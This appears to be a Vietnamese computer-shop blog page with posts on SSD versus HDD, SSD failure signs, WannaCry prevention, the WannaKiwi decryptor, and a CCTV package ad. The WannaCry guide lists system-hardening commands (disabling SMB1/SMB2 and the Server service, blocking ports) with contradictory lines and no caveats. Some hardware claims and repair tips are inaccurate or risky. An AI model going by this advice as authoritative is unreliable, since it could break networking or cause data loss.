Shopping cart

close
FREE STANDARD SHIPPING ON ALL ORDERS ABOVE £40

Tin Công Nghệ

Tin Tức Công Nghệ , Windows, Windows Phone , Mobile…

Read More
Tin Công Nghệ

Điểm khác nhau cơ bản giữa SSD/HDD và những dấu hiệu cho thấy SSD của bạn sắp hỏng

[​IMG]

Ngoài HDD, ổ SSD là một trong các thiết bị để lưu trữ dữ liệu trên PC hay Laptop đang được rất nhiều người sử dụng. SSD có khá nhiều lợi thế khi so với HDD như tốc độ, độ bền…Dù vậy, không có thiết bị nào là có thể sử dụng hoàn hảo trọn đời cả. Theo đó, TECHRUM sẽ giới thiệu cho bạn những khác biệt cơ bản giữa HDD và SSD, cũng như thông tin cho thấy ổ SSD của bạn sắp hỏng.

Điểm khác nhau giữa SSD và HDD:

1. Giá thành:

 • Ổ HDD có giá thấp hơn nhiều so với ổ SSD.
 • Với cùng một số tiền dùng để mua ổ cứng SSD 120GB, bạn cũng có thể mua được HDD với dung lượng 500 GB.

2. Tốc độ ghi ổ cứng

[​IMG]

Về tốc độ ghi: SSD nhanh hơn HDD. Cách dễ dàng nhận biết nhất: Tthông qua quá trình khởi động máy tính. Với cùng một hệ điều hành, khi bạn khởi động SSD, bạn chỉ mất khoảng 4s; còn với HDD mất khoảng 10s. Tốc độ đọc ghi của SSD sẽ từ 80MB – 300MB, với HDD thì dưới 100MB.

3. Sự phân mảnh ổ cứng

[​IMG]

Ổ cứng HDD chính là một đĩa kim loại phủ một lớp từ tính, dùng để lưu trữ dữ liệu. Khi đĩa quay, một thanh kim loại sẽ có chức năng đọc ghi dữ liệu. Tình trạng bị phân mảnh diễn ra là khi các dữ liệu nằm rải rác trên bề mặt đĩa quay. Nhưng với SSD thì khác, bên trong SSD là những con chip nhớ flash được liên kết với nhau; nên chắc chắn nó sẽ ít phân mảnh hơn ổ cứng HDD.

4. Độ bền của ổ cứng

Vì ổ HDD được cấu tạo bằng đĩa quay, cho nên trong quá trình sử dụng, nếu bạn tác động mạnh vào ổ thì sẽ gây ra hiện tượng kim quay bị lệch, dữ liệu sẽ không được đảm bảo an toàn. Trong khi ổ SSD ngược lại, vì nó lưu trên chip nhớ, nên dữ liệu được an toàn.

Dấu hiệu cho thấy ổ SSD sắp hỏng:

1. Hiện tượng Bad Block trên ổ SSD

Giống như ổ cứng HDD bị “Bad sector” thì trên ổ SSD cũng bị tình trạng “Bad Block”: có nghĩa là vùng lưu trữ dữ liệu của bạn bị gặp lỗi; dẫn đến tình trạng, khi bạn mở phần mềm nào đó, thì sẽ mất thêm thời gian để khởi động.
2. Đọc ghi dữ liệu thất bại

Nếu ổ cứng gặp tình trạng “Bad Block”, khi bạn sao chép hay đọc ghi dữ liệu vào vùng nhớ bị lỗi, thì hệ thống sẽ không cho phép. Thông thường, bạn vẫn có thể lấy dữ liệu của mình ở phân vùng đó, nhưng bạn sẽ không sao chép dữ liệu vào được. Nếu rơi vào hoàn cảnh này, bạn nên lưu trữ trên đám mây để bảo toàn dữ liệu.

[​IMG]

3. Các file hệ thống lỗi cần được sửa chữa

[​IMG]

Thỉnh thoảng, khi sử dụng máy tính Windows, bạn sẽ bắt gặp một thông báo là “The File System Needs Repair“. Nguyên nhân dẫn đến tình trạng này: do một tập tin hệ thống nào đó của bạn bị lỗi bởi do virus hoăc máy tính bị tắt đột ngột. Quá trình khôi phục vấn đề này có thể khiến bạn bị mất dữ liệu. Thế nên, bạn cần backup dữ liệu thường xuyên.

4. Quá trình khởi động Windows thất bại

Nếu trong quá trình sử dụng máy tính, bạn bắt gặp các thông báo như “A disk read error occurred“. Nếu bạn nhấn tổ hợp phím Ctrl + Alt + Delete, mà máy vẫn tiếp tục mắc lại lỗi đó, thì SSD của bạn đã gặp vấn đề. Bạn hãy thử xóa toàn bộ dữ liệu trongổ SSD, sau đó format cài mới lại hệ điều hành nhé.

5. Ổ SSD chỉ cho phép đọc và không cho phép ghi dữ liệu

Nếu vấn đề này xuất hiện, bạn cần phải sao chép dữ liệu của mình và thay thế ổ cứng khác. Khi SSD bị hỏng, nó sẽ không cho phép bạn ghi dữ liệu vào nữa. Bạn chỉ có thể mở dữ liệu và đọc thôi.

Read More
Thủ Thuật Kinh Nghiệm, Tin Công Nghệ

Tổng hợp những cách tự phòng chống mã độc tống tiền WannaCry (Phần 2)

[​IMG]

Có lẽ người dùng không thể biết được khi nào ransomware WannaCry mới chịu dừng lại. Ở phần 1, mình đã chia sẻ cho các bạn những cách phòng chống đơn giản và hiệu quả nhất mà không cần phải sử dụng phần mềm diệt virus. Tuy nhiên, nếu bạn là một người dùng khá chuyên về IT, thì ở bài này hoangdiep.net sẽ giới thiệu những công cụ phòng chống, các khuyến cáo mà Microsoft đưa ra cho người dùng để tự bảo vệ mình.

Đầu tiên bạn hãy tìm hiểu về cuộc tấn công này, và những tập tin mà Ransomware đang hướng đến, các trang Deep Web không được truy cập đến.

Update các bản vá quan trọng để bảo vệ máy tính

Bước 1: Đầu tiên, để ngăn ngừa cho máy tính khỏi bị nhiễm Ransomware bạn hãy update các bản vá của Windows XP, Windows 7, Windows Vista, Windows Server 2008, Windows Server 2008 R2, Windows 8.1, Windows Server 2012 and Windows Server 2012 R2, Windows RT 8.1, Windows 10, Windows Server 2016, Server Core installation option… Hãy chọn đúng phiên bản Windows mà bạn đang sử dụng, cùng với số bit (32 hoặc 64). Riêng đối với Windows 10 1703 bạn chỉ cần update tự động các bản vá, bật Windows Update cùng với Windows Defender.

Bước 2: Mọi phương án trên dùng để ngăn chặn cuộc tấn công này, nhưng tốt nhất bạn vẫn nên sao lưu dữ liệu của mình.

Phương án tốt nhất để ngăn chặn cuộc tấn công ransomeware

 • Sao lưu các tập tin quan trọng, để hạn chế mất dữ liệu.
 • Đừng mở tập tin đính kèm trong email không mong muốn, ngay cả khi được gửi đến từ những người trong danh sách liên lạc. Đừng nhấp chuột vào một URL mà bạn cảm thấy không an toàn.
 • Triển khai bộ lọc web và email trên mạng. Định cấu hình các thiết bị này để quét các miền, nguồn và địa chỉ xấu; Chặn chúng trước khi nhận và đọc tin nhắn.
 • Tắt macro trong các sản phẩm Microsoft Office. 
 • Duy trì cập nhật phần mềm chống virus trên tất cả các hệ thống
 • Bật kiểm soát nội dung trang web khi truy cập trên trình duyệt.
 • Tắt kết nối máy tính từ xa, và sử dụng các tài khoản có ít đặc quyền nhất.
 • Bật Windows firewall để bảo vệ máy tính của bạn.
 • Không cho phép bất cứ ai kết nối từ xa, điều khiển máy tính của bạn trong thời điểm nhạy cảm này.

Một số công cụ phòng chống:

Một số công cụ uy tín để phòng chống từ trung tâm Cryptologic quốc gia chống lại cuộc tấn công với Ransomware:

Đây là những hãng sản xuất phần mềm bảo mật tốt nhất hiện nay như: Microsoft, Bitdefender, Trendmicro… các bạn có thể yên tâm tải về và sử dụng. Với những thông tin và phương pháp phòng chống mà ở phần 1 và phần này mình viết, bạn có thể yên tâm khi sử dụng PC. Chúc các bạn vượt qua đợt tấn công một cách an toàn nhất.

Xem thêm : Công cụ giải mã thành công khi dính Wanna Cry

Read More
Thủ Thuật Kinh Nghiệm, Tin Công Nghệ

Tổng hợp những cách tự phòng chống mã độc tống tiền WannaCry (Phần 1)

[​IMG]

Một cuộc tấn công gần đây mang tên Wanna Cry đã tấn công 75.000 máy tính trên 150 quốc gia, trong đó có Việt Nam. Cho đến nay, nhiều người dùng nước ngoài đã quyết định trả số tiền để cứu dữ liệu khi bị virus. Tuy nhiên, không nên bỏ ra số tiền này, vì không có điều gì đảm bảo dữ liệu sẽ khôi phục lại như ban đầu. Hãy cùng hoangdiep.net tìm cách phòng chống ransomware Wanna Cry ngay bây giờ.

1. Sao lưu máy tính của bạn ngay lập tức

Lời khuyên mà mình dành cho các bạn là đừng liều mạng chơi với con virus này nếu chưa sao lưu dữ liệu cá nhân. Đầu tư vào một ổ cứng rời hoặc dịch vụ lưu trữ đám mây như OneDrive hoặc Google Drive để đưa toàn bộ dữ liệu của bạn đến nơi an toàn, đó là một quyết định đúng đắn.

2. Update bản vá của Windows gần đây nhất

Ransomware này lây lan qua một lỗ hổng trong hệ điều hành Microsoft Windows trước đây được khai thác bởi cơ quan giám sát của Hoa Kỳ NSA. Công cụ này không may đã bị rò rỉ vào tháng 4 năm 2017, và hiện tại đang được sử dụng bởi tin tặc trong cuộc tấn công ransomware Wanna Cry. Bản update gần đây nhất của Microsoft có thể chống lại cuộc tấn công này, và nếu bạn chưa bị tấn công, hãy update Windows ngay lập tức.

3. Cập nhật hệ điều hành của bạn

Mặc dù Microsoft đã phát hành bản vá cho lỗ hổng cực kỳ nghiêm trọng của Windows, tuy nhiên không ai biết rằng trong hệ điều hành Windows mình đang sử dụng còn lổ hỗng nào không. Bạn cần cập nhật hệ điều hành của mình lên phiên bản mới nhất.

 • Khuyến cáo nên sử dụng Windows 10 Version 1703 trở lên.

4. Bảo vệ mình trước những Email và Web độc hại

Email lừa đảo không phải là chuyện thường gặp, bất kỳ email nào cũng có thể liên kết đến các tập tin có chứa phần mềm độc hại cho máy tính. Ransomware cũng có thể lây nhiễm vào máy tính thông qua trang web độc hại. Việc bảo vệ tốt nhất trong các trường hợp như vậy là tránh bất kỳ liên kết trang web hoặc phần mềm mà trình duyệt báo không an toàn hoặc phát hiện chương trình Ransomware.

5. Sử dụng Firewall và Windows Defender

Sử dụng Firewall  Windows Defender sẽ ngăn không cho ransomware truy cập vào máy tính của bạn. Firewall sẽ bảo vệ cho bạn, và đảm bảo rằng không có một chương trình nào nguy hiểm hoặc truy cập vào máy tính khi chưa có sự đồng ý.

Bạn hãy cập nhật phần mềm diệt virus hoặc tường lửa của mình, để đảm bảo sự an toàn. Nếu bạn nhận được thông báo phát hiện virus nào trong máy, hãy đồng ý để các phần mềm diệt virus hoặc tường lửa ngăn chặn nó.

6. Không trả tiền để cứu dữ liệu

Bạn nên đầu tư tiền để mua tài khoản lưu trữ trước khi bị mất dữ liệu. Vì nếu bị dính virus này, bạn sẽ phải trả một số tiền rất lớn. Nên tạo một bản sao lưu của máy tính, và hãy cố gắng khôi phục lại trạng thái ban đầu khi bị tấn công. Đừng bỏ cuộc!

Ở những phần sau, mình sẽ đưa ra nhưng phương pháp giúp các bạn bảo vệ máy tính của mình, và những phần mềm diệt virus có thể chống lại cuộc tấn công Wanna Cry Ransomware. Các bạn đón đọc nhé!
———————-

Đây là solution ngăn ngừa của bên ngành An ninh Mạng của mình và group Linux , các bạn có thể tham khảo và làm theo. Cách này sẽ ngăn chặn được WannaCry và làm cho nó không mã hóa được dữ liệu của mình !
Lưu ý cách này chỉ hữu dụng đối với máy chưa nhiệm WannaCry.

A.Kiểm tra port 445
Mở CMD quyền Admin và gõ
netstat -an | findstr 445
Nếu gõ không hiện ra cái gì thì là OK còn nếu có chữ LISTENNING thì phải block port ngay
B. Tắt SMB (Mở Powershell lên và oánh các lệnh sau)
Mở Start-> Windows PowerShell-> Phải chuột vào Windows Powershell chọn Run as administrator
Copy từng dòng Paste vào. Nếu nó hiện lỗi gì thì bỏ qua sang dòng khác
Remove-WindowsFeature FS-SMB1
Disable-WindowsOptionalFeature -Online -FeatureName smb1protocol
sc.exe config lanmanworkstation depend= bowser/mrxsmb20/nsi
sc.exe config mrxsmb10 start= disabled
sc.exe config lanmanworkstation depend= bowser/mrxsmb10/nsi 
sc.exe config mrxsmb20 start= disabled
Set-SmbServerConfiguration -EnableSMB2Protocol $false
Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” SMB2 -Type DWORD -Value 0 -Force
B. Chặn port 445/137/138/139 trên Firewall
Máy nào cài Antivirus mà có tường lửa riêng thì phải cấu hình trên tường lửa riêng
của Anivirus
Còn máy nào ko xài Antivirus hoặc Windows Defener thì làm như sau
B1: Mở Start search cụm từ Firewall và chọn Windows Firewall with Advanced security
B2: Inbound Rules-> New Rule-> Port
B3: Chọn UDP-> Specific local ports nhập dòng này vào 445, 137, 138, 139
B4: Block the connection
B5: Tick cả 3 cái
B6: Đặt tên tùy ý-> finish
B7: Kiểm tra lại xem bật firewall chưa, chưa thì bật lên
C. Tắt Sever service
B1: Run-> Services.msc
B2: Tìm tới Services Server. Phải chuột chọn Stop
B3: Click đúp vào nó. Startup type sửa thành Disabled. Apply->OK
Sau khi làm xong tất cả RESTART LẠI MÁY. CẤM SHUTDOWN


Tổng hợp những cách tự phòng chống mã độc tống tiền WannaCry (Phần 1) |

Xem thêm : Công cụ giải mã thành công khi dính Wanna Cry

WannaCry
Read More
Tin Công Nghệ, Video Hướng dẫn

Đã có công cụ giải mã thành công WannaCry, WanaKiwi: WannaCry Ransomware Decryption Tool

WanaKiwi: WannaCry Ransomware Decryption Tool
Công cụ mang tên WannaKiwi sẽ khôi phục được máy tính Windows 7 và XP dính mã độc WannaCry.

Tin vui với những nạn nhân của WannaCry, Adrien Guinet – nhà nghiên cứu bảo mật tại Quarkslab – đã tìm ra cách để phục hồi các dữ liệu mã hoá bởi WannaCry. Công cụ này được đặt tên là WannaKey, chạy trên Windows XP.

Tuy nhiên, điều kiện để công cụ này phát huy tác dụng là máy tính của nạn nhân chưa khởi động lại sau khi nhiễm WannaCry. Khi đó, công cụ này sẽ phục hồi những chuỗi số nguyên tố trong đoạn mã RSA được sử dụng bởi WannaCry.

Da co cong cu giai ma thanh cong WannaCry hinh anh 1
Những máy tính dính mã độc WanaCry đã có “thuốc giải”.

Theo Adrien, khi mã độc WannaCry nhiễm vào máy tính, bên trong máy có tiến trình mang tên “wcry.exe”. Tiến trình này tạo ra RSA private key. Mấu chốt của vấn đề nằm ở việc mã độc này không xoá những chuỗi số nguyên tố từ bộ nhớ trước khi giải phóng RAM. Do đó, nếu máy tính nạn nhân chưa khởi động lại, những chuỗi số này vẫn còn và được dùng để giải mã dữ liệu bị mã hoá.

Hướng dẫn sử dụng công cụ WannaKiwi để giải mã độc WannaCry Công cụ mới có thể giải mã các dữ liệu trên máy tính nhiễm WannaCry với điều kiện máy chưa khởi động lại.

Sau khi Adrien công bố WannaKey, một nhà nghiên cứu khác tên Benjamin Delpy đã dựa trên phát hiện của Adrien để phát hành công cụ mang tên WannaKiwi, đơn giản hoá quá trình giải mã và phục hồi. Quan trọng hơn, nó còn hoạt động trên cả Windows 7.

WannaKiwi hiện được đăng tải trên GitHub để cộng đồng tải về sử dụng.

http://thehackernews.com/2017/05/wannacry-ransomware-decryption-tool.html

Read More
Tin Công Nghệ, Tin Tức

Ổ cứng SSD là gì, ổ cứng HDD là gì – So sánh sự khác nhau giữa SSD và HDD

Ổ cứng SSD là gì, ổ cứng HDD là gì – So sánh sự khác nhau giữa SSD và HDD


Rất nhiều người trong số chúng ta thường nhầm lẫn ổ cứng SSD và HDD không có gì khác biệt. Tuy nhiên, điều này là không chính xác. Vì thế, bài viết dưới đây của chúng tôi sẽ giúp bạn có cái nhìn rõ ràng về hai loại ổ cứng này.

Ổ cứng SSD, HDD là gì - So sánh sự khác nhau giữa SSD và HDD

Cho đến gần đây, người dùng máy tính có rất ít sự lựa chọn cho các loại lưu trữ tập tin trên laptop, ultrabook, hoặc máy tính để bàn của mình. Nếu bạn mua một chiếc ultrabook hay laptop siêu di động, bạn có thể có một ổ đĩa cứng (SSD) là ổ đĩa chính (C: trên Windows, Macintosh HD trên Mac). Mỗi máy tính để bàn hoặc máy tính xách tay dạng khác thì sử dụng ổ đĩa cứng (HDD). Với công nghệ hiện nay, bạn có thể lắp đặt vào vào bất kì hệ thống một ổ cứng HDD, SSD, hoặc một số trường hợp là cả hai. Nhưng làm thế nào để bạn lựa chọn? Đầu tiên, chúng tôi sẽ giải thích sự khác biệt giữa ổ cứng SSD và HDD sau đó đưa ra ưu điểm cũng như khuyết điểm của cả hai để giúp bạn đưa ra quyết định của mình.

Định nghĩa ổ cứng HDD và SSD

 

Ổ cứng SSD, HDD là gì - So sánh sự khác nhau giữa SSD và HDD

Ổ cứng HDD là gì?
Các ổ cứng quay truyền thống (HDD) là loại lưu trữ cơ bản và sẽ không thay đổi trên máy tính. Điều đó có nghĩa là nó không mất đi như các dữ liệu lưu trên bộ nhớ hệ thống khi bạn tắt máy tính. Ổ cứng HDD có cấu tạo cơ bản là đĩa kim loại được phủ một lớp từ tính. Đó là nơi chứa dữ liệu của bạn, từ các dữ liệu như dự báo thời tiết từ các thế kỷ trước, những bản phim độ nét cao của series Star Wars hay bộ sưu tập nhạc số. Khi ổ cứng HDD hoạt động, một đầu đọc / ghi trên một thanh kim loại sẽ truy cập vào dữ liệu trong khi phần đĩa cứng được quay trong một khay chứa đĩa.

Ổ cứng SSD là gì?
Ổ cứng SSD thực hiện nhiều công việc cùng chức năng (ví dụ lưu dữ liệu của bạn khi tắt hệ thống, khởi động hệ thống, v.v…) cũng như HDD, nhưng thay vì được phủ một lớp từ trên mặt đĩa cứng, các dữ liệu được lưu trữ trên những con chip bộ nhớ flash liên kết với nhau và giữ lại dữ liệu ngay cả khi không được cung cấp năng lượng. Những con chip này có thể được lắp đặt cố định trên bo mạch chủ của hệ thống (như trên một số máy tính xách tay nhỏ và ultrabooks), trên một card PCI / PCIe (ở một số máy trạm cao cấp), hoặc trong một chiếc hộp có kích thước, hình dạng, vừa với ổ cứng của laptop hoặc máy tính để bàn. Những con chip bộ nhớ flash này khác với bộ nhớ flash trong USB cũng như chủng loại và tốc độ ghi của bộ nhớ. Nó là các chủ đề về mặt kỹ thuật riêng biệt, nhưng đủ để nói rằng bộ nhớ flash trong ổ SSD nhanh hơn và đáng tin cậy hơn so với các bộ nhớ flash trong USB. Vì thế, các ổ cứng SSD thường đắt hơn USB trong cùng một khả năng lưu trữ.

Lịch sử của ổ cứng HDD và SSD
Công nghệ ổ cứng HDD có lịch sử tương đối lâu đời (từ khi máy tính bắt đầu xuất hiện). Có rất nhiều hình ảnh nổi tiếng của ổ cứng IBM 350 RAMAC (1956) sử dụng 50 chiếc đĩa rộng 24-inch chỉ để lưu trữ 3.75MB. Và tất nhiên, điều này có nghĩa là kích thước của một tập tin MP3 128Kbps trung bình sẽ được lưu trữ bằng một ổ cứng lớn như hai chiếc tủ lạnh. Vào thời điểm đó, IBM 350 chỉ được dùng bởi chính phủ và các doanh nghiệp nhưng đã sớm lỗi thời vào năm 1969. Sau đó, các hình thức ổ cứng PC được tiêu chuẩn hóa trong những năm đầu thập niên 1980 với các máy tính để bàn loại 5,25-inch, 3,5-inch và ổ đĩa máy tính xách tay loại 2,5-inch. Các giao diện cáp nội bộ đã thay đổi từ Serial đến IDE sau đó là SCSI và cuối cùng là SATA trong những năm qua, nhưng về cơ bản chúng đều có điểm chung là kết nối ổ cứng với bo mạch chủ của máy tính để dữ liệu của bạn có thể được xử lý. Ổ đĩa 2.5-inch và 3,5-inch hiện nay sử dụng giao diện SATA gần như độc quyền (ít nhất là trên hầu hết các máy tính cá nhân và máy tính Mac). Khả năng lưu trữ của ổ cứng từ đó cũng đã phát triển từ MB đến TB, tăng lên con số hàng triệu lần. Hiện tại ổ cứng HDD 3,5-inch có sức chứa tối đa là 10TB và các ổ cứng 2,5-inch chứa tối đa 3TB.

Trái ngược với HDD, ổ cứng SSD chỉ có lịch sử xuất hiện vài năm trở lại đây. Những bộ lưu trữ dữ liệu luôn là sự say mê với rất nhiều người dùng kể từ những ngày đầu xuất hiện máy tính cá nhân. Và bộ nhớ flash hiện tại chính là sự phát triển cao cấp của ổ cứng. Những con chip trong bộ nhớ flash này lưu trữ dữ liệu của bạn và nhưng lại không yêu cầu bạn phải cung cấp điện năng liên tục để giữ lại dữ liệu đó. Các thế hệ bộ nhớ flash đầu tiên mà chúng ta gọi là ổ cứng SSD bắt đầu nhờ vào sự nổi lên của các dòng netbook vào cuối những năm 2000. Mãi cho đến năm 2007, ổ cứng SSD dung lượng 1GB mới bắt đầu được sử dụng và tiếp theo đó là hàng loạt máy Asus Eee PC 700 sử dụng ổ cứng SSD 2GB lưu trữ chính. Các ổ SSD này khi gắn trên các thiệt bị cấu hình thấp những năm 2000 được hàn vĩnh viễn với bo mạch chủ. Theo thời gian, các loại netbook, Ultrabook, máy tính và máy tính xách tay siêu di động khác bắt đầu cần nhiều dung lượng lưu trữ hơn, vì vậy dung lượng của SSD cũng được tăng, và cuối cùng là được chuẩn hóa trên các ổ cứng 2,5-inch. Bằng cách này, bạn có thể tháo một ổ cứng 2,5-inch ra khỏi máy tính xách tay hoặc máy tính để bàn và thay thế nó dễ dàng với ổ SSD. Ngày nay, các dạng ổ cứng khác đã xuất hiện nhiều hơn, như thẻ mSATA SSD miniPCIe, M.2 SSD và ổ SSD DIMM giống với ổ cứng trong Apple MacBook Air, nhưng hiện tại nhiều ổ SSD vẫn được xây dựng dựa vào kích thước 2,5-inch. Các ổ cứng SSD 2,5-inch có dung lượng lớn nhất là 4TB, nhưng theo thời gian chắc chắn chúng sẽ có con số ngày một tăng lên.

Cả hai ổ SSD và ổ cứng HDD đều làm cùng một công việc: Khởi động hệ thống, lưu trữ các ứng dụng và các tập tin cá nhân của bạn. Tuy nhiên, mỗi loại hình lưu trữ có tính năng độc đáo của riêng mình. Và câu hỏi đặt ra là, đâu là sự khác biệt, và tại sao một người dùng nên chọn ổ cứng này thay vì ổ cứng khác?

So sánh sự khác nhau giữa SSD và HDD

Về giá: Thực tế, ổ cứng SSD đắt hơn nhiều so với ổ cứng HDD về số tiền phải bỏ ra trên mỗi GB. Đối với cùng một dung lượng và yếu tố bên trong ổ cứng 1TB 2,5-inch, bạn chỉ trả khoảng 60 $ đến 75 $ cho ổ cứng HDD nhưng phải trả một khoảng gấp đôi cho SSD với giá 130 $ đến 150 $. Điều này giúp giảm 7 cent cho mỗi GB trên HDD và 14 cent cho mỗi GB trên SSD. Trong tương lai gần khi ổ cứng lớn hơn và các hãng công nghệ được thành lập nhiều hơn, các ổ cứng này sẽ trở nên rẻ hơn.

Về dung lượng tối đa phổ biến: Như đã nói ở trên, đơn vị ổ cứng SSD lớn nhất là 4TB, nhưng những ổ cứng này vẫn còn rất hiếm và đắt tiền. Sẽ dễ hơn cho bạn khi tìm kiếm những ổ cứng 500GB đến 1TB như ổ đĩa chính trong hệ thống. Trong khi 500GB được coi là một “cơ sở” ổ cứng trong năm 2015, các lo ngại về giá có thể đẩy nó xuống đến 128GB SSD cho các hệ thống dựa trên giá thấp hơn. Người sử dụng các chức năng đa phương tiện sẽ cần nhiều hơn với dung lượng ổ đĩa phổ biến từ 1TB đến 4TB trong các hệ thống cao cấp.Về cơ bản, khả năng lưu trữ nhiều hơn thì sẽ có nhiều thứ được lưu trữ hơn như hình ảnh, âm nhạc, video, vv… mà bạn có thể lưu giữ trên máy tính của mình. Trong khi đó dịch vụ điện toán đám mây có thể là một nơi tốt để bạn chia sẻ các tập tin giữa điện thoại, máy tính bảng và máy tính, lưu trữ địa phương ít tốn kém hơn, và bạn chỉ phải mua nó một lần.

Về tốc độ: Đây là nơi mà ổ cứng SSD tỏa sáng.Một máy tính được trang bị SSD sẽ khởi động trong vài giây và chắc chắn dưới một phút. Một ổ cứng HDD sẽ cần có thời gian để tăng tốc độ lên đến thông số kỹ thuật vận hành, và sẽ tiếp tục là chậm hơn so với một ổ cứng SSD trong khi sử dụng bình thường. Một máy tính để bàn thông thường hoặc máy Mac có ổ cứng SSD khởi động nhanh hơn sẽ khởi động ứng dụng nhanh hơn, và có hiệu suất tổng thể nhanh hơn. Khi nhìn vào điểm chuẩn PCMark trên máy tính xách tay và máy tính để bàn với ổ SSD, chúng tôi nhận thấy điểm số của ổ SSD cao hơn nhiều so với ổ SSD. Cho dù đó là để phục vụ cho việc giải trí, học tập hoặc làm việc, tốc độ cộng thêm có thể là sự khác biệt của việc hoàn thành đúng thời hạn hay không.

Về sự phân mảnh: Do bề mặt đĩa quay của mình, ổ cứng HDD làm việc tốt nhất với các tập tin lớn hơn được đặt ra trong các khối liền kề. Bằng cách đó, các đầu đĩa có thể bắt đầu và kết thúc đọc nó trong một chuyển động liên tục. Khi ổ đĩa cứng bắt đầu ghi, các file lớn có thể trở thành rải rác xung quanh mâm đĩa, hay còn gọi là phân mảnh. Trong khi các thuật toán đọc/ghi đã được cải thiện giảm thiểu mức ảnh hưởng, thực tế của vấn đề là ổ cứng có thể bị phân mảnh, trong khi ổ SSD không quan tâm nơi dữ liệu được lưu trữ trên chip của mình, vì không có đầu đọc vật lý. Do đó, ổ SSD vẫn hoạt động tốt hơn.

Về độ bền: Ổ cứng SSD không có bộ phận chuyển động, vì vậy nó có nhiều khả năng để giữ cho dữ liệu của bạn an toàn trong trường hợp bạn làm rơi ba-lô máy tính xách tay hoặc hệ thống của bạn bị lung lay bởi một trận động đất trong khi nó đang hoạt động. Hầu hết các ổ đĩa cứng HDD đều không đọc/ghi khi hệ thống được tắt vì thế các dữ đang được đọc/ghi sẽ bay trên bề mặt đĩa ghi hàng trăm dặm một giờ khi chúng bắt đầu hoạt động. Vì thế, nếu bạn sử dụng ổ đĩa SSD thì điều này là có thể tránh khỏi.

Về sự phổ biến: Ổ cứng HDD thường có số lượng phong phú hơn so với SSD. Nhìn vào danh sách các sản phẩm từ Western Digital, Toshiba, Seagate, Samsung, và Hitachi, và bạn sẽ thấy nhiều mô hình HDD hơn SSD. Đối với máy tính để bàn và máy Mac, ổ cứng HDD bên trong sẽ không thể tháo ra hoàn toàn, ít nhất là trong vài năm tới. Bạn cũng sẽ thấy nhiều sự lựa chọn hơn với ổ cứng HDD từ các nhà sản xuất khác nhau cho cùng một khả năng lưu trữ. Tuy các dòng ổ cứng SSD vẫn đang trên đường phát triển về số lượng, nhưng ổ cứng vẫn chiếm đa số cho các thiết bị lưu trữ trong máy tính cá nhân.

Ổ cứng SSD, HDD là gì - So sánh sự khác nhau giữa SSD và HDD

Về yếu tố hình thức: Bởi vì ổ cứng HDD dựa trên đĩa quay nên có một giới hạn nhất định về việc thu nhỏ ổ cứng. Có khá nhiều sáng kiến để làm cho ổ cứng HDD 1,8-inch nhỏ hơn, nhưng nó lại bị hạn chế ở khoảng dung lượng 320GB để lưu trữ. Ổ SSD không có giới hạn, vì vậy họ có thể tiếp tục giảm trong thời gian tới. SSD có sẵn trong hộp ổ đĩa máy tính xách tay có kích thước 2,5-inch, nhưng đó chỉ là để thuận tiện. Khi máy tính xách tay trở nên mỏng hơn và máy tính bảng trở thành nền tảng lướt Web chính có thể bạn sẽ bắt đầu thấy việc áp dụng các ổ SSD ngày một tăng

Về tiếng ồn: Ngay cả ổ cứng HDD chạy khá êm cũng sẽ phát ra một chút tiếng ồn khi nó được sử dụng từ các ổ đĩa hoặc đầu đọc di chuyển qua lại, đặc biệt là nếu nó nằm trong một hệ thống được làm hoàn toàn bằng kim loại. Ổ cứng HDD nhanh hơn sẽ tạo ra nhiều tiếng ồn hơn so với những ổ cứng chậm. Ngược lại, ổ cứng SSD lại hầu như không có tiếng ồn nào khi hoạt động, vì nó không có nhiều cấu tạo bằng kim loại.

Nhìn chung: Các ổ cứng HDD thường có ưu điểm về giá thành, dung lượng, và sự phổ biến. Mặt khác, ổ cứng SSD làm việc tốt nhất nếu tốc độ, độ chắc chắn, yếu tố hình thức, tiếng ồn, hoặc phân mảnh (phần kỹ thuật của tốc độ) là những yếu tố quan trọng với bạn. Nếu như không có các vấn đề về giá thành và dung lượng, ổ SSD sẽ là là ổ cứng hoàn hảo nhất.

Theo thời gian, ổ cứng SSD sẽ bị mòn đi (mỗi tế bào trong ngân hàng bộ nhớ flash có một số hạn chế về thời gian nó có thể được viết và xóa) nhưng nhờ vào công nghệ TRIM được đưa vào ổ SSD, nó sẽ tự động tối ưu hóa các chu kỳ đọc/ghi giúp bạn có nhiều khả năng loại bỏ các hệ thống lỗi thời trước khi bắt đầu vào các lỗi đọc/ghi. Các trường hợp ngoại lệ có thể là người sử dụng thường dùng các chức năng đa phương tiện cao cấp như biên tập video, người đọc và ghi dữ liệu liên tục, nhưng những người sử dụng này thường sẽ cần dung lượng ổ đĩa lớn hơn. Các ổ đĩa cứng này cũng sẽ hao mòn dần với việc sử dụng liên tục, vì người dùng thường lưu bằng phương pháp vật lý. Để ổ cứng có thời gian sử dụng lâu và độ bền cao hơn thì khi sử dụng chúng ta nên quan tâm đến những nguyên nhân gây hư hỏng được liệt kê ở trên.

Vforum.vn(Theo pcmag.com)
Sau khi đọc bài viết này, bạn muốn nâng cấp lên SSD thì hay tới để được tư vấn và mua sản phẩm nhé !
Trung Tâm Phát Triển Tin Học HLC
Tam Đường – Lai Châu
0944.525.867 – 0961.525.867
Read More
Tin Công Nghệ, Videos

BỘ TRỌN GÓI CAMERA CAO CẤP FULL HD Dahua

BỘ TRỌN GÓI 1 CAMERA CAO CẤP Full HD

HỆ THỐNG TRỌN BỘ GÓI CAMERA QUAN SÁT CAO CẤP Full HD

so-do-he-thong-camera-quan-sat
Hình ảnh thực tế xem trên điện thoại :
Ứng dụng xem trực tuyến dành cho gia đình, cửa hàng, siêu thị, trường mầm non, hệ thống các công trình….
 Camera HLC  hoạt động trong lĩnh vực tư vấn, kinh doanh lắp đặt hệ thống camera quan sát, thiết bị an ninh như:
 • Giải pháp lăp đặt hệ thống, camera giám sát,
 • Lắp đặt hệ thống ,camera giám sát, cho tòa nhà, văn phòng,
 • Lắp đặt hệ thống camera, giám sát khu công nghiệp,
 • Lắp đặt hệ, thống camera giám, sát hộ gia đình,
 • Giải pháp lắp đặt hệ thống, thiết bị an ninh,
 • Hệ thống máy chấm công điện tử
 • Hệ thống kiểm, soát ra vào,
 • Hệ thống báo động, báo trộm, rò rỉ ga
 • Giải phát ,thiết bị văn phòng,
 • Lắp đặt ,thiết bị văn phòng, máy chiếu,

Máy Tính Laptop Camera HLC cung cấp giải pháp trọn gói, quý khách hàng không cần phải lo về các chi phí phát sinh cũng như bất cứ vấn đề kỹ thuật nào.

